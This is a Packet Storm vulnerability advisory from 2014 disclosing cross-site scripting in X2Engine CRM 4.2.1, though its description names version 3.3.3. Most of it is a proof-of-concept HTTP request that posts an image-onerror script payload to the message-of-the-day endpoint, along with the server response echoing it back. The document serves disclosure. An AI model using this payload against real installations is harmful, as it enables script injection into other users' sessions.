X2Engine CRM 4.2.1 Cross Site Scripting

2014-09-24T00:00:00
ID PACKETSTORM:128383
Type packetstorm
Reporter Vadodil Joel Varghese
Modified 2014-09-24T00:00:00

Description

                                        
                                            `#Affected Vendor: http://www.x2engine.com/  
#Date: 24/09/2014  
#Discovered by: JoeV  
#Type of vulnerability: XSS  
#Tested on: Windows 7  
#Version : 4.2.1  
  
#Description: X2Engine CRM v 3.3.3 is susceptible to Cross Site Scripting  
attack.  
  
Proof of Concept (PoC):  
---------------------------  
POST /index-test.php/site/motd HTTP/1.1  
Host: localhost  
Proxy-Connection: keep-alive  
Content-Length: 63  
Accept: */*  
Origin: http://localhost  
X-Requested-With: XMLHttpRequest  
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like  
Gecko) Chrome/37.0.2062.120 Safari/537.36  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
Referer: http://localhost/index-test.php/profile/1  
Accept-Encoding: gzip,deflate  
Accept-Language: en-US,en;q=0.8  
Cookie: iconSize=16x16; hudson_auto_refresh=true;  
/modules/system/admin.php_SystemAutotasks_sortsel=sat_name;  
/modules/system/admin.php_SystemAutotasks_ordersel=ASC;  
/modules/system/admin.php_limitsel=15;  
/modules/system/admin.php_SystemAutotasks_filtersel=default; cookies_on=1;  
__atuvc=2%7C39; PHPSESSID=6mefdfmcnj13282kb7anr4obe2  
  
message=%22%3E%3Cimg+src%3Dd+onerror%3Dconfirm(%2Fxss%2F)%3B%3E  
  
HTTP/1.1 200 OK  
Date: Wed, 24 Sep 2014 14:00:57 GMT  
Server: Apache/2.4.9 (Win32) PHP/5.5.12  
X-Powered-By: PHP/5.5.12  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
Cache-Control: no-store, no-cache, must-revalidate, post-check=0,  
pre-check=0  
Pragma: no-cache  
Content-Length: 37  
Content-Type: text/html  
  
"><img src=d onerror=confirm(/xss/);>  
  
--   
Regards,  
  
*Joel V*  
`